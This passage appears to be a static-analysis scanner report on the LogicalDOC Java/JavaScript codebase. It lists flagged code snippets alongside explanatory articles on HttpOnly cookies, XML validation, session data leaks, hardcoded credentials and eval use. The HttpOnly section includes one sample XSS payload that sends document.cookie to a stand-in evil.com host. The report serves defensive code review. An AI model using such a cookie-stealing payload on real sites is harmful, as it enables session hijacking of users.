40 else41 failureUrl.append("?");42 failureUrl.append("failure=");43 failureUrl.append(exception.getMessage());4445 Cookie failureCookie = new Cookie(COOKIE_LDOC_FAILURE, exception.getMessage());46 response.addCookie(failureCookie);47 48 log.info("Authentication was unsuccesful, redirecting to " + failureUrl.toString());49 response.sendRedirect(failureUrl.toString());50 }

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.javaCode:

32 public void onAuthenticationSuccess(HttpServletRequest request, HttpServletResponse response,33 Authentication authentication) throws IOException, ServletException {34 String param = request.getParameter(PARAM_SUCCESSURL);35 LDAuthenticationToken token = (LDAuthenticationToken) authentication;3637 Cookie sidCookie = new Cookie(LDAuthenticationToken.COOKIE_SID, token.getSid());38 response.addCookie(sidCookie);3940 if (param != null) {41 StringBuffer successUrl = new StringBuffer(param);42 log.info("Authentication of {} was succesful, redirecting to {}", authentication.getName(), successUrl);

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/charset/CharsetRecog_sbcs.javaCode:

1122 1123 abstract static class CharsetRecog_IBM420_ar extends CharsetRecog_sbcs1124 {1125 //arabic shaping class, method shape/unshape1126 //

https://localhost:443/scanner/article?articleName=/en/Java/CommonHttpOnlyCookie.html

https://localhost:443/scanner/article?articleName=/en/Java/CommonHttpOnlyCookie.html


protected static ArabicShaping as = new ArabicShaping(ArabicShaping.LETTERS_UNSHAPE);1127 protected byte[] prev_fInputBytes = null;11281129 protected static byte[] byteMap = {1130/* -0 -1 -2 -3 -4 -5 -6 -7 -8 -9 -A -B -C -D -E -F */1131/* 0- */ (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, 1132/* 1- */ (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40, (byte) 0x40,

HttpOnly Cookies

If the web application uses cookies that are available to browser scripts, and the application is vulnerable to Cross-Site Scripting (XSS) attacks, the malicious user could easily access the victim's cookies and use it to their own ends.

Example

Let's take a look at a web application that functions as a bulletin board. The user is authorized, and in order to maintain their session, their account information is stored in a cookie, which is sent to the server with every request.

Java@Overrideprotected void doGet( HttpServletRequest req, HttpServletResponse resp ) throws ServletException, IOException{ resp.addCookie( new Cookie( "Session", sessionId ) ); resp.addCookie( new Cookie( "User", user) ); ...}

If the application is vulnerable to XSS attacks [1], the malicious user could add their own script to the page. For example:

JavaScriptdocument.write('<timg src="https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + '" />)

This script will forward the victim's cookies to the malicious user's site. Using this data, the malicious user could imitate the victim's session, and access the application from their account.


Cookie theft could have the following consequences:

•accessing the victim's confidential information;

•giving the malicious user the ability to login to the application as the victim, sending false information, installing malicious scripts or links to malicious sites.


It is necessary to protect the application from XSS attacks [2] first.

•Modern browsers have a special mechanism in place to prevent access to the user's stored cookies by the page's scripts. This is called an HTTP-only cookie. In order to protect the cookie data from client-side scripting, you need to mark them as httpOnly. This can be done in several ways[3]:

•


Manually, by using the cookie.setHttpOnly(true); function•

Marking all the session-level cookies in web.xml:

Xml<session-config> <cookie-config> <http-only>true</http-only> </cookie-config></session-config>•

Setting most application servers to mark all cookies as httpOnly.

Note: setting the httpOnly tag does not fully guarantee the security of the cookie data, since it is possible to bypass it. The only way to completely protect it is by securing the application against all XSS attacks. However, we still recommend using the above mechanism as a second line of defense.

Java: Missing XML document schema validationSeverity: lowLanguage: JavaShort description: We often use XML documents to pass or store application data. If documents, received from untrusted sources are not checked against XSD or DTD schemas, the malicious user can pass unexpected or malicious data to the application.Full description: https://localhost:443/scanner/article?articleName=/en/Java/XmlValidationMissing.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/parser/AbiWordParser.javaCode:

69 }7071 @Override72 public void internalParse(InputStream input) {73 try {74 SAXParserFactory saxParserFactory = SAXParserFactory.newInstance();75 saxParserFactory.setValidating(false);76 SAXParser saxParser = saxParserFactory.newSAXParser();77 XMLReader xmlReader = saxParser.getXMLReader();78 xmlReader.setFeature("http://xml.org/sax/features/validation", false);79 xmlReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/parser/KOfficeParser.javaCode:

68 }6970 @Override71 public void internalParse(InputStream input) {72 try {73 SAXParserFactory saxParserFactory = SAXParserFactory.newInstance();74 saxParserFactory.setValidating(false);75 SAXParser saxParser = saxParserFactory.newSAXParser();76 XMLReader xmlReader = saxParser.getXMLReader();

https://localhost:443/scanner/article?articleName=/en/Java/XmlValidationMissing.html

https://localhost:443/scanner/article?articleName=/en/Java/XmlValidationMissing.html


77 xmlReader.setFeature("http://xml.org/sax/features/validation", false);78 xmlReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/parser/OpenOfficeParser.javaCode:

88 Thread.sleep(4000);89 } catch (Throwable t) {9091 }9293 SAXParserFactory saxParserFactory = SAXParserFactory.newInstance();94 saxParserFactory.setValidating(false);95 SAXParser saxParser = saxParserFactory.newSAXParser();96 XMLReader xmlReader = saxParser.getXMLReader();97 xmlReader.setFeature("http://xml.org/sax/features/validation", false);98 xmlReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/parser/XMLParser.javaCode:

36 public void internalParse(InputStream input) {37 try {38 CharArrayWriter writer = new CharArrayWriter();39 ExtractorHandler handler = new ExtractorHandler(writer);4041 SAXParserFactory factory = SAXParserFactory.newInstance();42 SAXParser parser = factory.newSAXParser();43 XMLReader reader = parser.getXMLReader();44 reader.setContentHandler(handler);45 reader.setErrorHandler(handler);46

Missing XML document schema validation

We often use XML documents to pass or store application data. If documents, received from untrusted sources are not checked against XSD or DTD schemas, the malicious user can pass unexpected or malicious data to the application.

Example

Let’s take a look at a code fragment that loads and analyzes an XML file received from the user:

Java// Read DOMtry { ... DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setValidating( false ); .... c_dom = factory.newDocumentBuilder().parse( xmlFile );} catch(Exception ex) { ...}

In general, insufficient XML file validation can lead to a parser error, which is a break in system workflow. If the application does not have sufficiently well realized error processing system, the malicious user can gain critical system information, or completely shut it down [1].


If the document is then transformed, the malicious user can add executable code to it that will be run on the server [2].Potential consequences


•Data corruption;

•Unpredictable program behavior;

•Granting the malicious user critical system information

•Running executable code.


Before parsing XML files from untrusted source, we recommend running the file through a validator. To do so, you need to develop a document schema, which is a file of a particular format that defines acceptable XML document structure for the application [3]. This schema is loaded into the validator, and the XML is then compared against it [4], like so:

JavaSchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);Schema schema = factory.newSchema(new File("mySchema.xsd"));Validator validator = schema.newValidator();

DocumentBuilder parser = DocumentBuilderFactory.newInstance().newDocumentBuilder();Document document = parser.parse(new File("myXMLDocument.xml"));validator.validate(new DOMSource(document));

You can also use a second type of XML validation: Document Type Definition (DTD) [5]. When using it, keep these things in mind:

•First of all, the DTD format is considered outdate, and the W3C does not recommend using it;

•Second of all, we recommend using external DTD, since internal ones (saved in the document itself) can only verify the document’s integrity, but not its applicability to the application.

Java: User Data Leak Between SessionsSeverity: lowLanguage: JavaShort description: If the user session data is written in the singleton object fields (such as servlets or controllers) or in the fields of public pool objects, a race situation might develop. In this case, the data from one session will be available to another one.Full description: https://localhost:443/scanner/article?articleName=/en/Java/CommonXre.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-webdav/src/main/java/com/logicaldoc/webdav/web/WebdavServlet.javaCode:

4647 public static final String INIT_PARAM_RESOURCE_CONFIG = "resource-config";

https://localhost:443/scanner/article?articleName=/en/Java/CommonXre.html

https://localhost:443/scanner/article?articleName=/en/Java/CommonXre.html


4849 public static final String CTX_ATTR_RESOURCE_PATH_PREFIX = "jackrabbit.webdav.simple.resourcepath";5051 private String resourcePathPrefix;5253 private String authenticate_header;5455 private LockManager lockManager;56

User Data Leak Between Sessions

If the user session data is written in the singleton object fields (such as servlets or controllers) or in the fields of public pool objects, a race situation might develop. In this case, the data from one session will be available to another one.

Example

Let's take a look at a guestbook. The user enters their name and a message, and the data is sent to the server where it is processed. In response, the application sends the user a greeting and a small thank you message.

Javapublic class GuestBook extends HttpServlet { String name;

protected void doPost (HttpServletRequest req, HttpServletResponse res) { name = req.getParameter("name"); ... out.println(name + ", thank you for joining us!"); }}

In a single thread mode, this application will work as designed. However, note that the user name is written into the class field. In case of multithreading, if two users send their data at the same time, we can have a race situation [1]. Let's suppose that two users, John and Peter, access the guestbook simultaneously. The application then does the following:

JavaThread 1: GuestBook.name = "John"Thread 2: GuestBook.name = "Peter"...Thread 1: out.println("Peter" + ", thank you for joining us!");Thread 2: out.println("Peter" + ", thank you for joining us!");

Both users would receive the same message.


Information Leak.


We recommend keeping session data in local variables, since they are safe for multithreading;

•There is an interface HttpSession [2], that is designed for storing session data, which simplifies the session cycle.

Java: Using Hardcoded CredentialsSeverity: low


Language: JavaShort description: The software contains a hard-coded password, which it uses for its own inbound authentication or for outbound communication to external componentsFull description: https://localhost:443/scanner/article?articleName=/en/Java/CommonHardcodedPassword.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/User.javaCode:

3839 private String username = "";4041 private String password = "";4243 private String passwordmd4 = "";4445 private String name = "";4647 private String firstName = "";48

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/common/client/Constants.javaCode:

67 // The currenly logged user identifier8 public static final String AUTH_USERID = "authUserId";910 // The currenly logged user password11 public static final String AUTH_PASSWORD = "authPassword";1213 // The current user session14 public static final String USER_SESSION = "UserSession";1516 // The language of the currently logged user

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/common/client/Constants.javaCode:

132133 public static final String COOKIE_SAVELOGIN = "ldoc-savelogin";134135 public static final String COOKIE_USER = "ldoc-user";136137 public static final String COOKIE_PASSWORD = "ldoc-password";138139 public static final String COOKIE_VERSION = "ldoc-version";140141 public static final String COOKIE_SID = "ldoc-sid";142

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/personal/ChangePassword.javaCode:

28 * 29 * @author Marco Meschieri - Logical Objects30 * @since 6.031 */32public class ChangePassword extends Window {

https://localhost:443/scanner/article?articleName=/en/Java/CommonHardcodedPassword.html





33 private static final String PASSWORD = "password";3435 private static final String NEWPASSWORDAGAIN = "newpasswordagain";3637 private static final String NEWPASSWORD = "newpassword";38


32public class ChangePassword extends Window {33 private static final String PASSWORD = "password";3435 private static final String NEWPASSWORDAGAIN = "newpasswordagain";3637 private static final String NEWPASSWORD = "newpassword";3839 private SecurityServiceAsync securityService = (SecurityServiceAsync) GWT.create(SecurityService.class);4041 public ChangePassword(final GUIUser user) {42 super();


30 * @since 6.031 */32public class ChangePassword extends Window {33 private static final String PASSWORD = "password";3435 private static final String NEWPASSWORDAGAIN = "newpasswordagain";3637 private static final String NEWPASSWORD = "newpassword";3839 private SecurityServiceAsync securityService = (SecurityServiceAsync) GWT.create(SecurityService.class);40

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/security/SetPassword.javaCode:

29 * @since 6.030 */31public class SetPassword extends Window {32 private static final String NOTIFY = "notify";3334 private static final String NEWPASSWORDAGAIN = "newpasswordagain";3536 private static final String NEWPASSWORD = "newpassword";3738 private SecurityServiceAsync securityService = (SecurityServiceAsync) GWT.create(SecurityService.class);39


File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/security/SetPassword.javaCode:

31public class SetPassword extends Window {32 private static final String NOTIFY = "notify";3334 private static final String NEWPASSWORDAGAIN = "newpasswordagain";3536 private static final String NEWPASSWORD = "newpassword";3738 private SecurityServiceAsync securityService = (SecurityServiceAsync) GWT.create(SecurityService.class);3940 public SetPassword(final long userId) {41 super();

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/tenant/SetAdminPassword.javaCode:

25 * @author Marco Meschieri - Logical Objects26 * @since 6.927 */28public class SetAdminPassword extends Window {2930 private static final String NEWPASSWORD = "newpassword";3132 private static final String NEWPASSWORDAGAIN = "newpasswordagain";3334 private TenantServiceAsync service = (TenantServiceAsync) GWT.create(TenantService.class);35

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/tenant/SetAdminPassword.javaCode:

27 */28public class SetAdminPassword extends Window {2930 private static final String NEWPASSWORD = "newpassword";3132 private static final String NEWPASSWORDAGAIN = "newpasswordagain";3334 private TenantServiceAsync service = (TenantServiceAsync) GWT.create(TenantService.class);3536 public SetAdminPassword(final String tenantName) {37 super();

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/login/client/ChangePassword.javaCode:

35public class ChangePassword extends Window {36 private static final String PASSWORD = "password";3738 private static final String NEWPASSWORDAGAIN = "newpasswordagain";3940 private static final String NEWPASSWORD = "newpassword";4142 private SecurityServiceAsync securityService = (SecurityServiceAsync) GWT.create(SecurityService.class);43


44 public ChangePassword(final GUIUser user) {45 super();


33 * @since 6.034 */35public class ChangePassword extends Window {36 private static final String PASSWORD = "password";3738 private static final String NEWPASSWORDAGAIN = "newpasswordagain";3940 private static final String NEWPASSWORD = "newpassword";4142 private SecurityServiceAsync securityService = (SecurityServiceAsync) GWT.create(SecurityService.class);43


31 * 32 * @author Marco Meschieri - Logical Objects33 * @since 6.034 */35public class ChangePassword extends Window {36 private static final String PASSWORD = "password";3738 private static final String NEWPASSWORDAGAIN = "newpasswordagain";3940 private static final String NEWPASSWORD = "newpassword";41

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/setup/client/Setup.javaCode:

7475 private static final String DB_TYPE = "dbType";7677 private static final String DB_ENGINE = "dbEngine";7879 private static final String DB_PASSWORD = "dbPassword";8081 private static final String DB_USERNAME = "dbUsername";8283 private static final String DB_URL = "dbUrl";84

Using Hardcoded Credentials

There are two typical scenarios where a developer might use hardcoded credentials while working on an application:

•If the application has to connect to external services that require authorization, such as a DBMS or LDAP;

•


If the application realizes authentication and client authorization for access to non-public functions. The most common variant of this would be a remote diagnostics or debugging feature. This type of feature is classified by experts as a backdoor. Regardless of the original purpose of the hardcoding credentials, their existence is a problem. In some cases, the malicious user can read these, and use them for unauthorized access to application functions, or to external services connected to it.

Example 1

Let's take a look at an example, where access to critical operations is granted to users that passed a login/password check. In addition to that, access is also granted to the test user with the password "debug" for remote debugging purposes:

Java@Overrideprotected void doGet( HttpServletRequest req, HttpServletResponse resp ) throws ServletException, IOException{ String login = req.getParameter( "login" ); String password = req.getParameter( "password" );

if( authenticate( login, password ) || "debug".equals( password ) ) { // обработка запроса }}

The "debug" password is not tracked by the centralized authentication system, which means it is impossible to turn it off using administrative measures. Moreover, the administrator might not even know about it. In this case, the constant password is not only an external threat, but could also be used by the developers for nefarious purposes.

Example 2

Let's take a look at an example where a constant login/password pair is used when connecting to a database:

Java...DriverManager.getConnection(url, "login", "password");...

If an outside user can get a look at the application source code, he will know the password, and he could gain access to the database. Changing the hardcoded password is only possible by updating the application. This means that in an event of a security breach, it would be impossible to close it quickly.

Note: The user does not need to have direct access to the source code, he could instead study the executable byte code using special tools.


The extent of potential problems depends on which authorization checks the given construction can bypass. In any case, using this method to bypass the standard control flow based on the username violates the overall security system, since it is not controlled by centralized methods.


We recommend against using hardcoded credentials;

•We recommend against using user account data to change information flow and bypass common authorization mechanisms. In this case the bypass is controlled by the system administrator, and can be closed after debugging the program;

•We recommend using common mechanisms to limit access to system resources, such as roles and user groups;

•


Account data that application uses to interact with external resources should be stored outside the code. For example, they can be stored in encrypted configuration files, protected storage, or a database unavailable to the outside. If encryption is not possible, ensure that access privileges to the file are properly set up;

•When creating new application user accounts, we recommend against using default values. Insist the user change their password after the first login;

•When storing user accounts, we recommend using hash functions [1] in order to prevent access even if the storage is stolen. In this case, authentication processes compare the hashes, rather than the passwords themselves. We also recommend using a randomly generated salt [2] for every password. This will make breaking in significantly more difficult.

Java: Violating the Java Object ModelSeverity: lowLanguage: JavaShort description: If an object redefines the equals() method without redefining the hashCode() method, it violates the Java object model requirement that equivalent objects must have an equivalent hash.Full description: https://localhost:443/scanner/article?articleName=/en/Java/RestrictionObjectModelViolation.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/i18n/Language.javaCode:

21 * Instances of this class represent a language supported by the LogicalDOC DMS22 * 23 * @author Alessandro Gasparini - Logical Objects24 * @since 3.0.325 */26public class Language implements Comparable<Language> {2728 protected static Logger log = LoggerFactory.getLogger(Language.class);2930 private Locale locale;3132 private Set<String> stopWords = new HashSet<String>();3334 private Analyzer analyzer;3536 private String analyzerClass;3738 private SnowballProgram stemmer;3940 public Language(Locale locale) {41 this.locale = locale;42 loadStopwords();43 }4445 public Locale getLocale() {46 return locale;47 }4849 public String getLanguage() {50 return locale.getLanguage();51 }5253 public String getDisplayLanguage() {

https://localhost:443/scanner/article?articleName=/en/Java/RestrictionObjectModelViolation.html





54 return locale.getDisplayLanguage();55 }5657 public String getDefaultDisplayLanguage() {58 return locale.getDisplayLanguage(Locale.ENGLISH);59 }6061 /**62 * Populates the field stopWords reading the resource63 * /stopwords/stopwords_<locale>.txt64 */65 void loadStopwords() {66 try {67 Set<String> swSet = new HashSet<String>();68 String stopwordsResource = "/stopwords/stopwords_" + getLocale().toString() + ".txt";69 log.debug("Loading stopwords from: " + stopwordsResource);69...

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/Client.javaCode:

4 * A remote client connected to LogicalDOC5 * 6 * @author Marco Meschieri - LogicalDOC7 * @since 7.58 */9public class Client {1011 /**12 * An optional Identifier of the client, you must guarantee that this is13 * unique.14 */15 private String id;1617 private String address;1819 private String host;2021 public Client() {22 }2324 public Client(String address, String host) {25 this(null, address, host);26 }2728 public Client(String id, String address, String host) {29 super();30 this.id = id;31 this.address = address;32 this.host = host;33 }3435 public String getId() {36 return id;37 }3839 public void setId(String id) {40 this.id = id;41 }4243 public String getAddress() {44 return address;45 }4647 public void setAddress(String address) {48 this.address = address;49 }


5051 public String getHost() {52 return host;52...

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/SoftwareVersion.javaCode:

4 * Models a generic sofwtare version5 * 6 * @author Marco Meschieri - Logical Objects7 * @since 6.8.18 */9public class SoftwareVersion implements Comparable<SoftwareVersion> {1011 private String version;1213 public final String get() {14 return this.version;15 }1617 public SoftwareVersion(String version) {18 if (version == null)19 throw new IllegalArgumentException("Version can not be null");20 if (!version.matches("[0-9]+(\\.[0-9]+)*"))21 throw new IllegalArgumentException("Invalid version format");22 this.version = version;23 }2425 @Override26 public int compareTo(SoftwareVersion that) {27 if (that == null)28 return 1;29 String[] thisParts = this.get().split("\\.");30 String[] thatParts = that.get().split("\\.");31 int length = Math.max(thisParts.length, thatParts.length);32 for (int i = 0; i < length; i++) {33 int thisPart = i < thisParts.length ? Integer.parseInt(thisParts[i]) : 0;34 int thatPart = i < thatParts.length ? Integer.parseInt(thatParts[i]) : 0;35 if (thisPart < thatPart)36 return -1;37 if (thisPart > thatPart)38 return 1;39 }40 return 0;41 }4243 @Override44 public boolean equals(Object that) {45 if (this == that)46 return true;47 if (that == null)48 return false;49 if (this.getClass() != that.getClass())50 return false;51 return this.compareTo((SoftwareVersion) that) == 0;52 }52...

Violating the Java Object Model


If an object redefines the equals() method without redefining the hashCode() method, it violates the Java object model requirement that equivalent objects must have an equivalent hash.

Example

Let's take a look at an Article type object

Javapublic class Article{ private final String name;

public Article( String name ) { this.name = name; }

@Override public boolean equals(Object o) { if( this == o ) return true; if( !( o instanceof Article ) ) return false; return name.equals( ((Article)o).name ); }}

The Article class redefines the equals() method in such a way that articles are considered equal if they have equal names. The class does not redefine the hashCode() method. By default, every object inherits the hashCode() method from the base Object class, and uses the object's address in the memory as its hash. This means that two object of the Article class will have different hashes, even if they are equal.

Let's take a look at a collection Article objects:

Javapublic static void main(String[] args) { HashSet<Article> articles = new HashSet<Article> (); Article a1 = new Article("My Article"); Article a2 = new Article("My Article"); articles.add(a1); articles.add(a2); }

The code in the example works fine, since a1.hashCode()!=a2.hashCode(). In the add method description you can see that only unique objects are added to a collection. In other words, the following must be true: an object e is added to the collection if there is no object e2 such that (e==null ? e2==null:e.equals(e2)). This means that our example vontradicts the definition of HashSet.

HashSet is not the only example of a collection that breaks the object model.


Breaking this requirement of equal hash codes for equal objects will lead to problems in dealing with collections, as well as errors in application logic. This is especially critical in dealing with hash tables and sets.

Removal Recommendations

The realized class has to redefine both equals() and hashCode() in such a way that this requirement is fulfilled:

Javao1.equals(o2) && (o1.hashCode() == o2.hashCode())

By default, the equals() method only returns true if the object is compared to itself. Hash codes are unique (as much as possible, of course)


to each object.

JavaScript: Incorrect User Input Filtration when Generating Code on the FlySeverity: highLanguage: JavaScriptShort description: This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.Full description: https://localhost:443/scanner/article?articleName=/en/JavaScript/InjectionCode.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-gui/war/login/hosted.htmlCode:

128 for (var i = 0; i < argCount; i++) {129 argList += ",p" + i;130 }131 var argListNoComma = argList.substring(1);132133 return eval(134 "__gwt_tearOffGenerators[" + argCount + "] =\n" +135 " function(dispId) {\n" +136 " return function(" + argListNoComma + ") {\n" +137 " var result = __static(dispId, this" + argList + ");\n" +138 " if (result[0]) {\n" +139 " throw result[1];\n" +140 " } else {\n" +141 " return result[1];\n" +142 " }\n" +143 " }\n" +144 " }\n"145 ); 146}147148function __gwt_makeResult(isException, result) {149 return [isException, result];150}

File name: logicaldoc/logicaldoc-gui/war/login/hosted.htmlCode:

90 for (var i = 0; i < argCount; i++) {91 argList += ",p" + i;92 }93 var argListNoComma = argList.substring(1);9495 return eval(96 "__gwt_javaInvokes[" + argCount + "] =\n" +97 " function(thisObj, dispId" + argList + ") {\n" +98 " var result = __static(dispId, thisObj" + argList + ");\n" +99 " if (result[0]) {\n" +100 " throw result[1];\n" +101 " } else {\n" +102 " return result[1];\n" +103 " }\n" +104 " }\n"

https://localhost:443/scanner/article?articleName=/en/JavaScript/InjectionCode.html

https://localhost:443/scanner/article?articleName=/en/JavaScript/InjectionCode.html


105 ); 106}107108/*109 * This is used to create tear-offs of Java methods. Each function corresponds110 * to exactly one dispId, and also embeds the argument count. We get the "this"

File name: logicaldoc/logicaldoc-gui/war/login/login.nocache.jsCode:

6function h(){var a=n.getElementsByTagName(hb);for(var b=0;b<a.length;++b){if(a[b].src.indexOf(ib)!=-1){return e(a[b].src)}}return T}7function i(){var a;if(typeof isBodyLoaded==jb||!isBodyLoaded()){var b=kb;var c;n.write(lb+b+mb);c=n.getElementById(b);a=c&&c.previousSibling;while(a&&a.tagName!=nb){a=a.previousSibling}if(c){c.parentNode.removeChild(c)}if(a&&a.src){return e(a.src)}}return T}8function j(){var a=n.getElementsByTagName(ob);if(a.length>0){return a[a.length-1].href}return T}9function k(){var a=n.location;return a.href==a.protocol+pb+a.host+a.pathname+a.search+a.hash}10var l=g();if(l==T){l=h()}if(l==T){l=i()}if(l==T){l=j()}if(l==T&&k()){l=e(n.location.href)}l=f(l);t=l;return l}11function I(){var b=document.getElementsByTagName(qb);for(var c=0,d=b.length;c<d;++c){var e=b[c],f=e.getAttribute(rb),g;if(f){f=f.replace(sb,T);if(f.indexOf(tb)>=0){continue}if(f==ub){g=e.getAttribute(vb);if(g){var h,i=g.indexOf(wb);if(i>=0){f=g.substring(0,i);h=g.substring(i+1)}else{f=g;h=T}u[f]=h}}else if(f==xb){g=e.getAttribute(vb);if(g){try{D=eval(g)}catch(a){alert(yb+g+zb)}}}else if(f==Ab){g=e.getAttribute(vb);if(g){try{C=eval(g)}catch(a){alert(yb+g+Bb)}}}}}}12function J(a){var b=u[a];return b==null?null:b}13function K(a,b){var c=A;for(var d=0,e=a.length-1;d<e;++d){c=c[a[d]]||(c[a[d]]=[])}c[a[e]]=b}14function L(a){var b=w[a](),c=v[a];if(b in c){return b}var d=[];for(var e in c){d[c[e]]=e}if(D){D(a,d,b)}throw null}15var M;function N(){if(!M){M=true;var a=n.createElement(Cb);a.src=Db;a.id=U;a.style.cssText=Eb;a.tabIndex=-1;n.body.appendChild(a);o&&o({moduleName:U,sessionId:p,subSystem:V,evtGroup:_,millis:(new Date).getTime(),type:Fb});a.contentWindow.location.replace(t+P)}}16w[Gb]=function(){var b=navigator.userAgent.toLowerCase();var c=function(a){return parseInt(a[1])*1000+parseInt(a[2])};if(function(){return b.indexOf(Hb)!=-1}())return Ib;if(function(){return b.indexOf(Jb)!=-1&&n.documentMode>=10}())return Kb;if(function(){return b.indexOf(Jb)!=-1&&n.documentMode>=9}())return Lb;if(function(){return b.indexOf(Jb)!=-1&&n.documentMode>=8}())return Mb;if(function(){return b.indexOf(Nb)!=-1}())return Ob;return Pb};v[Gb]={gecko1_8:0,ie10:1,ie8:2,ie9:3,safari:4};login.onScriptLoad=function(){if(M){r=true;G()}};login.onInjectionDone=function(){q=true;o&&o({moduleName:U,sessionId:p,subSystem:V,evtGroup:Qb,millis:(new Date).getTime(),type:ab});G()};I();H();var O;var P;if(F()){if(m.external&&(m.external.initModule&&m.external.initModule(U))){m.location.reload();return}P=Rb;O=T}o&&o({moduleName:U,sessionId:p,subSystem:V,evtGroup:W,millis:(new Date).getTime(),type:Sb});if(!F()){try{K([Ib],Tb);K([Ob],Ub);O=A[L(Gb)];var Q=O.indexOf(Vb);if(Q!=-1){B=Number(O.substring(Q+1));O=O.substring(0,Q)}P=O+Wb}catch(a){return}}var R;function S(){if(!s){s=true;G();if(n.removeEventListener){n.removeEventListener(Xb,S,false)}if(R){clearInterval(R)}}}

File name: logicaldoc/logicaldoc-gui/war/login/login.nocache.jsCode:

6function h(){var a=n.getElementsByTagName(hb);for(var b=0;b<a.length;++b){if(a[b].src.indexOf(ib)!=-1){return e(a[b].src)}}return T}7function i(){var a;if(typeof isBodyLoaded==jb||!isBodyLoaded()){var b=kb;var c;n.write(lb+b+mb);c=n.getElementById(b);a=c&&c.previousSibling;while(a&&a.tagName!=nb){a=a.previousSibling}if(c){c.parentNode.removeChild(c)}if(a&&a.src){return e(a.src)}}return T}8function j(){var a=n.getElementsByTagName(ob);if(a.length>0){return a[a.length-1].href}return T}


9function k(){var a=n.location;return a.href==a.protocol+pb+a.host+a.pathname+a.search+a.hash}10var l=g();if(l==T){l=h()}if(l==T){l=i()}if(l==T){l=j()}if(l==T&&k()){l=e(n.location.href)}l=f(l);t=l;return l}11function I(){var b=document.getElementsByTagName(qb);for(var c=0,d=b.length;c<d;++c){var e=b[c],f=e.getAttribute(rb),g;if(f){f=f.replace(sb,T);if(f.indexOf(tb)>=0){continue}if(f==ub){g=e.getAttribute(vb);if(g){var h,i=g.indexOf(wb);if(i>=0){f=g.substring(0,i);h=g.substring(i+1)}else{f=g;h=T}u[f]=h}}else if(f==xb){g=e.getAttribute(vb);if(g){try{D=eval(g)}catch(a){alert(yb+g+zb)}}}else if(f==Ab){g=e.getAttribute(vb);if(g){try{C=eval(g)}catch(a){alert(yb+g+Bb)}}}}}}12function J(a){var b=u[a];return b==null?null:b}13function K(a,b){var c=A;for(var d=0,e=a.length-1;d<e;++d){c=c[a[d]]||(c[a[d]]=[])}c[a[e]]=b}14function L(a){var b=w[a](),c=v[a];if(b in c){return b}var d=[];for(var e in c){d[c[e]]=e}if(D){D(a,d,b)}throw null}15var M;function N(){if(!M){M=true;var a=n.createElement(Cb);a.src=Db;a.id=U;a.style.cssText=Eb;a.tabIndex=-1;n.body.appendChild(a);o&&o({moduleName:U,sessionId:p,subSystem:V,evtGroup:_,millis:(new Date).getTime(),type:Fb});a.contentWindow.location.replace(t+P)}}16w[Gb]=function(){var b=navigator.userAgent.toLowerCase();var c=function(a){return parseInt(a[1])*1000+parseInt(a[2])};if(function(){return b.indexOf(Hb)!=-1}())return Ib;if(function(){return b.indexOf(Jb)!=-1&&n.documentMode>=10}())return Kb;if(function(){return b.indexOf(Jb)!=-1&&n.documentMode>=9}())return Lb;if(function(){return b.indexOf(Jb)!=-1&&n.documentMode>=8}())return Mb;if(function(){return b.indexOf(Nb)!=-1}())return Ob;return Pb};v[Gb]={gecko1_8:0,ie10:1,ie8:2,ie9:3,safari:4};login.onScriptLoad=function(){if(M){r=true;G()}};login.onInjectionDone=function(){q=true;o&&o({moduleName:U,sessionId:p,subSystem:V,evtGroup:Qb,millis:(new Date).getTime(),type:ab});G()};I();H();var O;var P;if(F()){if(m.external&&(m.external.initModule&&m.external.initModule(U))){m.location.reload();return}P=Rb;O=T}o&&o({moduleName:U,sessionId:p,subSystem:V,evtGroup:W,millis:(new Date).getTime(),type:Sb});if(!F()){try{K([Ib],Tb);K([Ob],Ub);O=A[L(Gb)];var Q=O.indexOf(Vb);if(Q!=-1){B=Number(O.substring(Q+1));O=O.substring(0,Q)}P=O+Wb}catch(a){return}}var R;function S(){if(!s){s=true;G();if(n.removeEventListener){n.removeEventListener(Xb,S,false)}if(R){clearInterval(R)}}}

